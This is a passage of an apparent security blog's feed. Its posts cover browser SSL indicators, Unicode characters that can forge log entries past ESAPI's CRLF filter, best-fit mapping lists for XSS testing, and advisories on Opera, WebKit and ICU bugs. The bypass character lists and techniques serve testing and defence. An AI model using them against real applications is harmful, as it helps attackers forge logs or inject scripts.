usability testing, but modifying significant design elements does change the game for better or worse.  
Here's a look at how the following browsers display an active and error-free SSL connection to the end user.&lt;br/&gt;&lt;ul&gt;&lt;br/&gt;	&lt;li&gt;Internet Explorer 9&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Internet Explorer 8&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Firefox 4&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Firefox 3&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Opera 11&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Safari 5&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Konqueror 4&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Chrome 11&lt;/li&gt;&lt;br/&gt;&lt;/ul&gt;&lt;br/&gt;Note that in the case of SSL connections which do contain errors, such as an invalid host name or an expired SSL certificate, the presentation changes, often significantly, to warn the end user that something bad is happening.  With one exception at the end, I'm not showing what those look like.&lt;br/&gt;&lt;br/&gt;The following screenshots compare the display of a standard SSL certificate with that of an EVSSL certificate, and are only from valid, error-free SSL certificates and connections.  Summarized as a table:&lt;br/&gt;&lt;table style="width: 90%;"&gt;&lt;br/&gt;&lt;tbody&gt;&lt;br/&gt;&lt;tr style="color: black; font-color: white;"&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="text-decoration: underline;"&gt;&lt;strong&gt;Browser&lt;/strong&gt;&lt;/span&gt;&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;strong&gt;&lt;span style="text-decoration: underline;"&gt;Standard SSL&lt;/span&gt;&lt;/strong&gt;&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="text-decoration: underline;"&gt;&lt;strong&gt;EVSSL&lt;/strong&gt;&lt;/span&gt;&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Internet Explorer 9&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Gray padlock in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Gray padlock plus full &lt;span style="color: #339966;"&gt;green &lt;/span&gt;address bar with company name or CA&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Internet Explorer 8&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #ffff00;"&gt;Yellow &lt;/span&gt;padlock in address 
bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #ffff00;"&gt;Yellow &lt;/span&gt;padlock plus full &lt;span style="color: #339966;"&gt;green &lt;/span&gt;address bar with company name or CA&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Firefox 4&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #0000ff;"&gt;Blue &lt;/span&gt;security emblem in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #008000;"&gt;Green &lt;/span&gt;security emblem in address bar with company name&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Firefox 3&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #0000ff;"&gt;&lt;span style="color: #000000;"&gt;Padlock at bottom plus&lt;/span&gt; blue &lt;/span&gt;security emblem in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Padlock at bottom plus &lt;span style="color: #339966;"&gt;green &lt;/span&gt;emblem in address bar with company name&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Chrome 11&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #339966;"&gt;Green &lt;/span&gt;padlock in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #339966;"&gt;Green &lt;/span&gt;padlock plus &lt;span style="color: #339966;"&gt;green &lt;/span&gt;emblem in address bar with company name&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Opera 11&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Dark padlock plus &lt;span style="color: #ffff00;"&gt;yellow &lt;/span&gt;emblem in address bar written as "Secure"&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Dark padlock plus &lt;span style="color: #339966;"&gt;green &lt;/span&gt;emblem in address bar written as "Trusted"&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Konqueror 4&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #339966;"&gt;Green &lt;/span&gt;shield with white check mark in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: 
#339966;"&gt;Green &lt;/span&gt;shield with white check mark in address bar&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Safari 5&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Gray padlock in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Gray padlock plus green company name in address bar&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;/tbody&gt;&lt;br/&gt;&lt;/table&gt;&lt;br/&gt;For more information about how browsers handle SSL certificates see the &lt;a href="http://code.google.com/p/browsersec/wiki/Part2#Protocol-level_encryption_facilities"&gt;Browser Security Handbook&lt;/a&gt;.&lt;br/&gt;&lt;h2&gt;Internet Explorer 9&lt;/h2&gt;&lt;br/&gt;&amp;nbsp;&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ie9.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="IE9 displaying a basic SSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ie9.png" alt="IE9 displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With the basic SSL certificate above you can see a small, almost discreet, gray padlock icon in the right hand side of the address bar.  
There are no other visual signs.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ie9-evssl.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="IE9 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ie9-evssl.png" alt="IE9 displaying an EVSSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate the same padlock exists but the entire address bar is also colored green.&lt;br/&gt;&lt;h2&gt;Internet Explorer 8&lt;/h2&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ie8.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="IE8 displaying a basic SSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ie8.png" alt="IE8 displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With the standard SSL certificate above there's a yellow padlock displayed in the area to the right of the address bar.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ie8-evssl.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="IE8 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ie8-evssl.png" alt="IE8 displaying an EVSSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate above there's the same yellow padlock displayed along with identity information, and the entire address bar is colored green.&lt;br/&gt;&lt;h2&gt;Firefox 4&lt;/h2&gt;&lt;br/&gt;&amp;nbsp;&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ff4.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="FF4 displaying a standard certificate and security connection" 
src="http://www.lookout.net/wp-content/uploads/2011/05/ff4.png" alt="FF4 displaying a standard certificate and security connection" width="842" height="701" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With a standard certificate above there's no padlock displayed anywhere, but there is an informational emblem displayed between the favicon and the URL in the address bar.  Its standard color is blue for any site, so this is not meant to look branded to Facebook even though it happens to use the same colors.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ff4-evssl.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="FF4 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ff4-evssl.png" alt="FF4 displaying an EVSSL certificate and security connection" width="842" height="701" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate above there's no padlock displayed anywhere, but there is an informational emblem displayed between the favicon and the URL in the address bar.  
It's colored green.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ff4-google.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="FF4 displaying a standard certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ff4-google.png" alt="FF4 displaying a standard certificate and security connection" width="842" height="701" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;The above shot of https://encrypted.google.com is just to emphasize that the security emblem has a standard blue color.&lt;br/&gt;&lt;h2&gt;Firefox 3&lt;/h2&gt;&lt;br/&gt;&amp;nbsp;&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ff3-ubuntu.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="FF3 displaying a standard certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ff3-ubuntu.png" alt="FF3 displaying a standard SSL certificate and security connection" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With a standard certificate above there's a padlock displayed in the bottom right, and an informational blue-colored emblem displayed between the favicon and the URL in the address bar.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ff3-evssl-ubuntu.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="FF3 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ff3-evssl-ubuntu.png" alt="FF3 displaying an EVSSL certificate and security connection" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate above there's a padlock displayed in the bottom right, and an informational green-colored emblem displayed between the favicon and the URL in the address bar.&lt;br/&gt;&lt;h2&gt;Google Chrome 11&lt;/h2&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/chrome11.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Chrome 11 
displaying a basic SSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/chrome11.png" alt="Chrome 11 displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With a standard certificate above there's a small green padlock displayed in the left-hand side of the address bar.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/chrome11-evssl.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Chrome 11 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/chrome11-evssl.png" alt="Chrome 11 displaying an EVSSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate above there's a small green padlock displayed in the left-hand side of the address bar along with a green-colored informational emblem.&lt;br/&gt;&lt;h2&gt;Opera 11&lt;/h2&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/opera11.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Opera 11 displaying a basic SSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/opera11.png" alt="Opera 11 displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With a standard certificate above there's a small dark padlock displayed in the left-hand side of the address bar along with a yellow-colored "Secure" emblem.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/opera11-evssl.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Opera 11 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/opera11-evssl.png" alt="Opera 11 displaying an EVSSL certificate and security connection" width="845" height="715" 
/&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate above there's a small dark padlock displayed in the left-hand side of the address bar along with a green-colored "Trusted" emblem.&lt;br/&gt;&lt;h2&gt;Konqueror 4&lt;/h2&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/konqueror4-ubuntu.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Konqueror 4 displaying a basic SSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/konqueror4-ubuntu.png" alt="Konqueror 4 displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With a standard certificate above there's a small green shield with a white check mark in the right-hand side of the address bar.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/konqueror4-evssl-ubuntu.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Konqueror 4 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/konqueror4-evssl-ubuntu.png" alt="Konqueror 4 displaying an EVSSL certificate and security connection" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate above there's the same small green shield with a white check mark in the right-hand side of the address bar.&lt;br/&gt;&lt;h2&gt;Safari 5&lt;/h2&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/safar5.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Safari 5 displaying a basic SSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/safar5.png" alt="Safari 5 displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With a standard certificate above there's a small gray padlock in the right-hand side of the address bar.&lt;br/&gt;&lt;br/&gt;&lt;a 
href="http://www.lookout.net/wp-content/uploads/2011/05/safari5-evssl.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Safari 5 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/safari5-evssl.png" alt="Safari 5 displaying an EVSSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate above there's a small gray padlock in the right-hand side of the address bar.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/safari5-error.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Safari 5 displaying an SSL certificate with errors" src="http://www.lookout.net/wp-content/uploads/2011/05/safari5-error.png" alt="Safari 5 displaying an SSL certificate with errors" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;Just couldn't resist putting in a shot of a standard certificate with errors (host name does not match).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-3606848082126858505?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/05/how-web-browsers-display-standard-ssl.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-435767834116842847</guid><pubDate>Wed, 11 May 2011 16:04:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.769-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>security</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Injecting new line characters (e.g. CR LF) into security logs with
Unicode</title><description>Today I was asked if ESAPI's approach to sanitizing log messages for CRLF (carriage return, line feed) injection was sound.   "CRLF Injection" in this case describes an attack whereby textual content such as records in a security log can be forged.  Imagine a plain text security log file that separates log entries with two CRLF sequences.  In hex this would look like 0x0D 0x0A 0x0D 0x0A.  I'm using plain text here to keep it simple, but hopefully real logs would be using some form of markup.  If the input validation routines did not sanitize CR LF characters then an attacker could manipulate their input to create what appeared to be new records in the log.  Here's a snippet from ESAPI which attempts to protect against this:&lt;br/&gt;&lt;br/&gt;&lt;code&gt; // ensure no CRLF injection into logs for forging records&lt;/code&gt;&lt;br/&gt;&lt;code&gt;String clean = message.replace('\n', '_').replace('\r', '_');&lt;br/&gt;if (ESAPI.securityConfiguration().getLogEncodingRequired()) {&lt;br/&gt;clean = ESAPI.encoder().encodeForHTML(message);&lt;br/&gt;if (!message.equals(clean)) {&lt;br/&gt;clean += " (Encoded)";&lt;br/&gt;}&lt;br/&gt;&lt;/code&gt;&lt;code&gt;}&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;Note:&lt;/strong&gt; I have never worked with or tested ESAPI.  I don't know what actions the methods &lt;code&gt;getLogEncodingRequired()&lt;/code&gt; and &lt;code&gt;encodeForHTML(message)&lt;/code&gt; perform, so I don't know at all if ESAPI would be vulnerable to the attacks I'm about to describe.  Maybe someone from ESAPI can jump in.  I'm only using ESAPI to make the example more realistic.&lt;br/&gt;&lt;br/&gt;ESAPI is concerned with the visual (human-readable) appearance of log entries here and not how software processes the characters in those entries.  
There seem to be three vectors that would screw up ESAPI's logic for protecting against CRLF injection:&lt;br/&gt;&lt;ol&gt;&lt;br/&gt;	&lt;li&gt;Unicode normalization that decomposes and maps a character (or set of characters) to either a CR or an LF&lt;br/&gt;&lt;strong&gt;* Not a problem.&lt;/strong&gt;&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;&lt;strong&gt;&lt;/strong&gt;Charset best-fit mappings that map input characters to either CR or LF during transcoding&lt;br/&gt;&lt;strong&gt;* Unpredictable problem.&lt;/strong&gt;&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;&lt;strong&gt;&lt;/strong&gt;Unicode characters that provide the same visual effect as CR and LF&lt;br/&gt;&lt;strong&gt;* Definitely a problem.&lt;/strong&gt;&lt;/li&gt;&lt;br/&gt;&lt;/ol&gt;&lt;br/&gt;#1 You don’t have to worry about this one.  The four Unicode normalization forms do not map any characters to CR or LF.&lt;br/&gt;&lt;br/&gt;#2 Best-fits are tough to predict, because they can differ per platform.  Below is the set of characters I know of that will best-fit map to either U+000A (LF) or U+000D (CR) in the given charset (e.g. CP424).&lt;br/&gt;&lt;br/&gt;&lt;code&gt;000A	008E	#REPEAT	CP424&lt;br/&gt;000A	25D9	--		IBMGRAPH&lt;br/&gt;000A	008E	#CONTROL	CP037&lt;br/&gt;000A	008E	#CONTROL	CP1026&lt;br/&gt;000A	008E	#CONTROL	CP500&lt;br/&gt;000A	008E	#CONTROL	CP875&lt;br/&gt;000A	2326	# ERASE TO THE RIGHT # Delete right (right-to-left text)	KEYBOARD&lt;br/&gt;000D	266A	02	IBMGRAPH&lt;br/&gt;&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;#3 Here is the most practical and most obvious attack.  
Each of the following Unicode characters (code points) will create a visual “new line” effect.&lt;br/&gt;&lt;br/&gt;&lt;code&gt;U+000A  LINE FEED (LF)&lt;br/&gt;U+000B  LINE TABULATION&lt;br/&gt;U+000D  CARRIAGE RETURN (CR)&lt;br/&gt;U+000C  FORM FEED (FF)&lt;br/&gt;U+0085  NEXT LINE (NEL)&lt;br/&gt;U+2028  LINE SEPARATOR&lt;br/&gt;U+2029  PARAGRAPH SEPARATOR&lt;br/&gt;&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;This means ESAPI should be filtering out all of these as well if it plans to handle Unicode input.&lt;br/&gt;&lt;br/&gt;Of course there’s a #4 I didn’t mention – concerning the target locale and character encoding of the logs.&lt;br/&gt;&lt;br/&gt;I assume this ESAPI function is concerned with logs written using Latin characters in a Western locale.  I tend to agree that blacklisting is not the best answer but sometimes it makes sense and works.  If the logs are written out in plain text encoded with UTF-8 or another Unicode encoding then #3 above would be a problem.&lt;br/&gt;&lt;br/&gt;Isn’t the wacky world of Unicode and internationalization fun?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-435767834116842847?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/05/injecting-new-line-characters-eg-cr-lf.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-4055934862863483905</guid><pubDate>Mon, 20 Dec 2010 11:05:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.750-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>sql injection</category><category domain='http://www.blogger.com/atom/ns#'>best-fit</category><category domain='http://www.blogger.com/atom/ns#'>XSS</category><category domain='http://www.blogger.com/atom/ns#'>testing</category><category 
domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>List of characters for testing Unicode transformations and best-fit
mapping to dangerous ASCII</title><description>I'm attaching two CSV files for use in test cases and tools.  The uni2asc.csv file contains all of the Unicode characters that map to something ASCII &amp;lt; 0x80.  The bestfit.csv file contains all of the known best-fit mappings to dangerous ASCII between legacy charsets and Unicode.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2010/12/uni2asc.csv"&gt;uni2asc.csv&lt;/a&gt; - for straight Unicode to Unicode mappings&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2010/12/bestfit.csv"&gt;bestfit.csv&lt;/a&gt; - for legacy charset to Unicode mappings&lt;br/&gt;&lt;br/&gt;&lt;span style="color: #000000;"&gt;I gave these to Gareth so they may wind up in &lt;a href="http://hackvertor.co.uk/public"&gt;HackVertor&lt;/a&gt;. &lt;/span&gt;&lt;br/&gt;&lt;br/&gt;The Unicode database contains metadata about every character, including compatibility mappings, normalization mappings, case mappings, and other decomposition data.  It's useful for testing to know what special Unicode characters may transform to dangerous ASCII.  For example:&lt;br/&gt;&lt;ul&gt;&lt;br/&gt;	&lt;li&gt;The U+2134 SCRIPT SMALL O character will transform to U+006F LATIN SMALL LETTER O in certain cases&lt;/li&gt;&lt;br/&gt;&lt;/ul&gt;&lt;br/&gt;Of course, if you're testing for SQL injection or XSS you probably want to know what transforms to dangerous characters like ' and &amp;lt;.  We attempted to automate some of this in our &lt;a href="http://xss.codeplex.com/"&gt;x5s tool&lt;/a&gt; which has done a good job so far, and we have a big update for that coming soon.&lt;br/&gt;&lt;br/&gt;In the bestfit.csv file you'll find all of the best-fit mappings from Unicode to dangerous ASCII &amp;lt; 0x80 (and vice versa) in many of the legacy charsets from &lt;a href="http://unicode.org/Public/MAPPINGS/"&gt;http://unicode.org/Public/MAPPINGS/&lt;/a&gt;.  There's some wild legacy stuff in here.  
For example:&lt;br/&gt;&lt;ul&gt;&lt;br/&gt;	&lt;li&gt;&lt;br/&gt;&lt;div id="_mcePaste"&gt;In APL-ISO-IR-68, 0x27 maps to 0x5D in Unicode, and vice versa.&lt;/div&gt;&lt;/li&gt;&lt;br/&gt;&lt;/ul&gt;&lt;br/&gt;If you put these to use anywhere please let me know so I can pass the word along.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-4055934862863483905?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2010/12/list-of-characters-for-testing-unicode.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-5914398733817312479</guid><pubDate>Wed, 18 Nov 2009 21:50:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.821-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>IDN</category><category domain='http://www.blogger.com/atom/ns#'>advisory</category><category domain='http://www.blogger.com/atom/ns#'>fuzzing</category><category domain='http://www.blogger.com/atom/ns#'>Opera</category><title>Advisory: Certain domain names could allow execution of arbitrary code
in Opera</title><description>Opera released 10.01 recently, which fixed a memory corruption issue found with Casaba’s IDN/URI fuzzer.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.opera.com/support/kb/view/938/"&gt;http://www.opera.com/support/kb/view/938/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-5914398733817312479?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/11/advisory-certain-domain-names-could.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-5590090167740145181</guid><pubDate>Mon, 27 Jul 2009 21:47:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.797-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>tools</category><category domain='http://www.blogger.com/atom/ns#'>XSS</category><category domain='http://www.blogger.com/atom/ns#'>testing</category><title>Unibomber tool for specialized XSS testing</title><description>At Black Hat I’m planning to demo a new tool we’ve been putting together at &lt;a href="http://www.casabasecurity.com"&gt;Casaba Security&lt;/a&gt;. It’s mostly a brute force input testing tool right now, aimed at finding cross-site scripting (XSS) bugs but with a unique set of techniques. It automates the testing process greatly, by auto-injecting a canary and ID into each input be it query string, HTTP header, or POST parameter.&lt;br/&gt;&lt;br/&gt;It basically bombs a Web-app with a slew of Unicode characters to find XSS bugs – hence the name – &lt;strong&gt;Unibomber&lt;/strong&gt;.&lt;br/&gt;&lt;br/&gt;Appended to the canary is a special character – special because it can transform into a ‘dangerous’ character through normalization, casing, or best-fit mapping operations. 
So we end up injecting these special characters all over the place and then detecting where they get transformed and displayed as output.&lt;br/&gt;&lt;br/&gt;The beauty is that we can find both reflected and persistent XSS bugs this way. It’s not a one-click tool, though; it is intended for an experienced tester who knows how to find and exploit an XSS bug. The Unibomber assists the pen-tester by automating input-injection and ‘output encoding’ detection to find the vulnerability hotspots.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-5590090167740145181?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/07/unibomber-tool-for-specialized-xss.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-6633995309537574606</guid><pubDate>Mon, 08 Jun 2009 21:46:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.838-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>advisory</category><category domain='http://www.blogger.com/atom/ns#'>Webkit</category><title>Advisory: Webkit – Visiting a maliciously crafted website may lead to a
cross-site scripting attack</title><description>More from: &lt;a href="http://support.apple.com/kb/HT3613"&gt;http://support.apple.com/kb/HT3613&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;CVE-ID: CVE-2006-2783&lt;br/&gt;&lt;br/&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.7, Mac OS X Server v10.5.7, Windows XP or Vista&lt;br/&gt;&lt;br/&gt;Impact: Visiting a maliciously crafted website may lead to a cross-site scripting attack&lt;br/&gt;&lt;br/&gt;Description: WebKit ignores Unicode byte order mark sequences when parsing web pages. Certain websites and web content filters attempt to sanitize input by blocking specific HTML tags. This approach to filtering may be bypassed and lead to cross-site scripting when encountering maliciously-crafted HTML tags containing byte order mark sequences. This update addresses the issue through improved handling of byte order mark sequences. Credit to Chris Weber of Casaba Security, LLC for reporting this issue.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-6633995309537574606?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/06/advisory-webkit-visiting-maliciously.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-4299647340174693096</guid><pubDate>Mon, 08 Jun 2009 21:20:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.761-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>advisory</category><category domain='http://www.blogger.com/atom/ns#'>ICU</category><title>Advisory: International Components for Unicode – Maliciously crafted
content may bypass website filters and result in cross-site scripting</title><description>Update from: &lt;a href="http://support.apple.com/kb/HT3613"&gt;http://support.apple.com/kb/HT3613&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;CVE-ID: CVE-2009-0153&lt;br/&gt;&lt;br/&gt;Available for: Windows XP or Vista&lt;br/&gt;&lt;br/&gt;Impact: Maliciously crafted content may bypass website filters and result in cross-site scripting&lt;br/&gt;&lt;br/&gt;Description: An implementation issue exists in ICU’s handling of certain character encodings. Using ICU to convert invalid byte sequences to Unicode may result in over-consumption, where trailing bytes are considered part of the original character. This may be leveraged by an attacker to bypass filters on websites that attempt to mitigate cross-site scripting. This update addresses the issue through improved handling of invalid byte sequences. For Mac OS X v10.5 systems, this issue is addressed in Mac OS X v10.5.7. Credit to Chris Weber of Casaba Security for reporting this issue.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 